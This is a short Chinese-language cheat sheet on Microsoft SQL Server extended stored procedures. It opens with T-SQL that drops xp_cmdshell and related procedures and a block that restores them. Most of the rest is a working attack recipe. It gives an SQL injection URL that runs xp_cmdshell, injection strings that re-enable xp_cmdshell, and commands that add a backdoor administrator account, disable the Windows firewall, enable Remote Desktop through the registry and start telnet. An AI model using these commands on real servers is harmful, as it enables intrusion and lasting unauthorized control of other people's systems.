删除:
use master exec sp_dropextendedproc 'xp_cmdshell' exec sp_dropextendedproc 'xp_enumgroups' exec sp_dropextendedproc 'xp_loginconfig' exec sp_dropextendedproc 'xp_enumerrorlogs' exec sp_dropextendedproc 'xp_getfiledetails' exec sp_dropextendedproc 'Sp_OACreate' exec sp_dropextendedproc 'Sp_OADestroy' exec sp_dropextendedproc 'Sp_OAGetErrorInfo' exec sp_dropextendedproc 'Sp_OAGetProperty' exec sp_dropextendedproc 'Sp_OAMethod' exec sp_dropextendedproc 'Sp_OASetProperty' exec sp_dropextendedproc 'Sp_OAStop' exec sp_dropextendedproc 'xp_regaddmultistring' exec sp_dropextendedproc 'xp_regdeletekey' exec sp_dropextendedproc 'xp_regdeletevalue' exec sp_dropextendedproc 'xp_regenumvalues' exec sp_dropextendedproc 'xp_regremovemultistring' exec sp_dropextendedproc 'xp_regwrite' drop procedure sp_makewebtask go
恢复:
use master EXEC sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll' EXEC sp_addextendedproc xp_enumgroups ,@dllname ='xplog70.dll' EXEC sp_addextendedproc xp_loginconfig ,@dllname ='xplog70.dll' EXEC sp_addextendedproc xp_enumerrorlogs ,@dllname ='xpstar.dll' EXEC sp_addextendedproc xp_getfiledetails ,@dllname ='xpstar.dll' EXEC sp_addextendedproc Sp_OACreate ,@dllname ='odsole70.dll' EXEC sp_addextendedproc Sp_OADestroy ,@dllname ='odsole70.dll' EXEC sp_addextendedproc Sp_OAGetErrorInfo ,@dllname ='odsole70.dll' EXEC sp_addextendedproc Sp_OAGetProperty ,@dllname ='odsole70.dll' EXEC sp_addextendedproc Sp_OAMethod ,@dllname ='odsole70.dll' EXEC sp_addextendedproc Sp_OASetProperty ,@dllname ='odsole70.dll' EXEC sp_addextendedproc Sp_OAStop ,@dllname ='odsole70.dll' EXEC sp_addextendedproc xp_regaddmultistring ,@dllname ='xpstar.dll' EXEC sp_addextendedproc xp_regdeletekey ,@dllname ='xpstar.dll' EXEC sp_addextendedproc xp_regdeletevalue ,@dllname ='xpstar.dll' EXEC sp_addextendedproc xp_regenumvalues ,@dllname ='xpstar.dll' EXEC sp_addextendedproc xp_regremovemultistring ,@dllname ='xpstar.dll' EXEC sp_addextendedproc xp_regwrite ,@dllname ='xpstar.dll' EXEC sp_addextendedproc xp_dirtree ,@dllname ='xpstar.dll' EXEC sp_addextendedproc xp_regread ,@dllname ='xpstar.dll' EXEC sp_addextendedproc xp_fixeddrives ,@dllname ='xpstar.dll' go
对于mssql SA权限的注入, 最简单的运行方法可以用如下方法测试:
http://test.com/chan.aspx?id1=14';EXEC xp_cmdshell 'net user perl perl6 /add'--+
在注入方面, 如果要恢复, 可以这样:
EXEC sp_configure 'show advanced options',1//允许修改高级参数 RECONFIGURE EXEC sp_configure 'xp_cmdshell',1 //打开xp_cmdshell扩展 RECONFIGURE
或者:
';EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
在注入添恢复扩展后, 用如下方式可添加管理员与添加3389:
EXEC xp_cmdshell 'net user colesec pa$$w0rd /ADD'
EXEC xp_cmdshell 'net localgroup Administrators colesec /ADD'
EXEC xp_cmdshell 'netsh firewall set opmode disable' EXEC xp_cmdshell 'reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'
#注意这里:
#如果xp_cmdshell不行, 记得改为master..xp_cmdshell
#上面第四条语句, 是dos下的注删表操作, 关于开3389与查看3389窗口, 可查看如下链接:
除了xp_cmdshell还有操作注册表的:
xp_regaddmultistring xp_regdeletekey //删除键 xp_regdeletevalue //删除值 xp_regenumkeys xp_regenumvalues //返回多个值 xp_regread //读取键值 xp_regremovemultistring xp_regwrite //写入键值 控制服务的xp_servicecontrol等 开启telnet服务 execmaster..xp_servicecontrol 'start', 'tlntsvr'